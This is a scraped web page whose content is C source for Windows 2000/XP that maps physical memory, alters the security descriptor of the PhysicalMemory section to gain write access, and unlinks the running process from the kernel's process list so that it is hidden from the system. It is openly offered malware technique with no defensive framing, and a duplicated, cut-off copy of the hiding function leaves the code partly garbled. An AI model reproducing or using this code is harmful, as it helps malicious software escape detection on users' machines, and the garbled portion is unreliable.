<script type="text/javascript">
</script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
<script type="text/javascript">
</script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
- #include <windows.h>
- #include <Accctrl.h>
- #include <Aclapi.h>
- #define NT_SUCCESS(Status) ((NTSTATUS) (Status) >= 0)
- #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L)
- #define STATUS_ACCESS_DENIED ((NTSTATUS) 0xC0000022L)
- typedef LONG NTSTATUS;
- typedef struct _IO_STATUS_BLOCK
- {
- NTSTATUS Status;
- ULONG Information;
- } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
- typedef struct _UNICODE_STRING
- {
- USHORT Length;
- USHORT MaximumLength;
- PWSTR Buffer;
- } UNICODE_STRING, *PUNICODE_STRING;
- #define OBJ_INHERIT 0x00000002L
- #define OBJ_PERMANENT 0x00000010L
- #define OBJ_EXCLUSIVE 0x00000020L
- #define OBJ_CASE_INSENSITIVE 0x00000040L
- #define OBJ_OPENIF 0x00000080L
- #define OBJ_OPENLINK 0x00000100L
- #define OBJ_KERNEL_HANDLE 0x00000200L
- #define OBJ_VALID_ATTRIBUTES 0x000003F2L
- typedef struct _OBJECT_ATTRIBUTES
- {
- ULONG Length;
- HANDLE RootDirectory;
- PUNICODE_STRING ObjectName;
- ULONG Attributes;
- PVOID SecurityDescriptor;
- PVOID SecurityQualityOfService;
- } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
- typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(OUT PHANDLE SectionHandle,
- IN ACCESS_MASK DesiredAccess,
- IN POBJECT_ATTRIBUTES ObjectAttributes);
- typedef VOID (CALLBACK* RTLINITUNICODESTRING)(IN OUT PUNICODE_STRING DestinationString,
- IN PCWSTR SourceString);
- RTLINITUNICODESTRING RtlInitUnicodeString;
- ZWOPENSECTION ZwOpenSection;
- HMODULE g_hNtDLL = NULL;
- PVOID g_pMapPhysicalMemory = NULL;
- HANDLE g_hMPM = NULL;
- OSVERSIONINFO g_osvi;
- //---------------------------------------------------------------------------
- BOOL InitNTDLL()
- {
- g_hNtDLL = LoadLibrary("ntdll.dll");
- if (NULL == g_hNtDLL)
- return FALSE;
- RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,
- "RtlInitUnicodeString");
- ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
- return TRUE;
- }
- //---------------------------------------------------------------------------
- VOID CloseNTDLL()
- {
- if (NULL != g_hNtDLL)
- FreeLibrary(g_hNtDLL);
- g_hNtDLL = NULL;
- }
- //---------------------------------------------------------------------------
- VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
- {
- PACL pDacl = NULL;
- PSECURITY_DESCRIPTOR pSD = NULL;
- PACL pNewDacl = NULL;
- DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,
- NULL, &pDacl, NULL, &pSD);
- if (ERROR_SUCCESS != dwRes)
- {
- if (pSD)
- LocalFree(pSD);
- if (pNewDacl)
- LocalFree(pNewDacl);
- }
- EXPLICIT_ACCESS ea;
- RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
- ea.grfAccessPermissions = SECTION_MAP_WRITE;
- ea.grfAccessMode = GRANT_ACCESS;
- ea.grfInheritance= NO_INHERITANCE;
- ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
- ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
- ea.Trustee.ptstrName = "CURRENT_USER";
- dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
- if (ERROR_SUCCESS != dwRes)
- {
- if(pSD)
- LocalFree(pSD);
- if(pNewDacl)
- LocalFree(pNewDacl);
- }
- dwRes = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
- NULL, NULL, pNewDacl, NULL);
- if (ERROR_SUCCESS != dwRes)
- {
- if (pSD)
- LocalFree(pSD);
- if (pNewDacl)
- LocalFree(pNewDacl);
- }
- }
- //---------------------------------------------------------------------------
- HANDLE OpenPhysicalMemory()
- {
- NTSTATUS status;
- UNICODE_STRING physmemString;
- OBJECT_ATTRIBUTES attributes;
- ULONG PhyDirectory;
- g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
- GetVersionEx(&g_osvi);
- if (5 != g_osvi.dwMajorVersion)
- return NULL;
- switch (g_osvi.dwMinorVersion)
- {
- case 0: //2k
- PhyDirectory = 0x30000;
- break;
- case 1: //xp
- PhyDirectory = 0x39000;
- break;
- default:
- return NULL;
- }
- RtlInitUnicodeString(&physmemString, L"//Device//PhysicalMemory");
- attributes.Length = sizeof(OBJECT_ATTRIBUTES);
- attributes.RootDirectory = NULL;
- attributes.ObjectName = &physmemString;
- attributes.Attributes = 0;
- attributes.SecurityDescriptor = NULL;
- attributes.SecurityQualityOfService = NULL;
- status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
- if (status == STATUS_ACCESS_DENIED)
- {
- status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
- SetPhyscialMemorySectionCanBeWrited(g_hMPM);
- CloseHandle(g_hMPM);
- status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
- }
- if (!NT_SUCCESS(status))
- return NULL;
- g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0,
- PhyDirectory, 0x1000);
- if (g_pMapPhysicalMemory == NULL)
- return NULL;
- return g_hMPM;
- }
- //---------------------------------------------------------------------------
- PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
- {
- ULONG VAddr = (ULONG)addr, PGDE, PTE, PAddr;
- PGDE = BaseAddress[VAddr>>22];
- if (0 == (PGDE & 1))
- return 0;
- ULONG tmp = PGDE & 0x00000080;
- if (0 != tmp)
- {
- PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
- }
- else
- {
- PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
- PTE = ((PULONG)PGDE)[(VAddr & 0x003FF000) >> 12];
- if (0 == (PTE & 1))
- return 0;
- PAddr = (PTE & 0xFFFFF000) + (VAddr & 0x00000FFF);
- UnmapViewOfFile((PVOID)PGDE);
- }
- return (PVOID)PAddr;
- }
- //---------------------------------------------------------------------------
- ULONG GetData(PVOID addr)
- {
- ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
- PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE,
- 0, phys & 0xfffff000, 0x1000);
- if (0 == tmp)
- return 0;
- ULONG ret = tmp[(phys & 0xFFF) >> 2];
- UnmapViewOfFile(tmp);
- return ret;
- }
- //---------------------------------------------------------------------------
- BOOL SetData(PVOID addr, ULONG data)
- {
- ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
- PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
- if (0 == tmp)
- return FALSE;
- tmp[(phys & 0xFFF)>>2] = data;
- UnmapViewOfFile(tmp);
- return TRUE;
- }
- //---------------------------------------------------------------------------
- long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
- {
- ExitProcess(0);
- return 1;
- }
- //---------------------------------------------------------------------------
- BOOL YHideProcess()
- {
- // SetUnhandledExceptionFilter(exeception);
- if (FALSE == InitNTDLL())
- return FALSE;
- if (0 == OpenPhysicalMemory())
- return FALSE;
- ULONG thread = GetData((PVOID)0xFFDFF124); //kteb
- ULONG process = GetData(PVOID(thread + 0x44)); //kpeb
- ULONG fw, bw;
- if (0 == g_osvi.dwMinorVersion)
- {
- fw = GetData(PVOID(process + 0xa0));
- bw = GetData(PVOID(process + 0xa4));
- }
- if (1 == g_osvi.dwMinorVersion)
- {
- fw = GetData(PVOID(process + 0x88));
- bw = GetData
- //---------------------------------------------------------------------------
- BOOL YHideProcess()
- {
- // SetUnhandledExceptionFilter(exeception);
- if (FALSE == InitNTDLL())
- return FALSE;
- if (0 == OpenPhysicalMemory())
- return FALSE;
- ULONG thread = GetData((PVOID)0xFFDFF124); //kteb
- ULONG process = GetData(PVOID(thread + 0x44)); //kpeb
- ULONG fw, bw;
- if (0 == g_osvi.dwMinorVersion)
- {
- fw = GetData(PVOID(process + 0xa0));
- bw = GetData(PVOID(process + 0xa4));
- }
- if (1 == g_osvi.dwMinorVersion)
- {
- fw = GetData(PVOID(process + 0x88));
- bw = GetData(PVOID(process + 0x8c));
- }
- SetData(PVOID(fw + 4), bw);
- SetData(PVOID(bw), fw);
- CloseHandle(g_hMPM);
- CloseNTDLL();
- return TRUE;
- }
- BOOL HideProcess()
- {
- static BOOL b_hide = false;
- if (!b_hide)
- {
- b_hide = true;
- YHideProcess();
- return true;
- }
- return true;
- }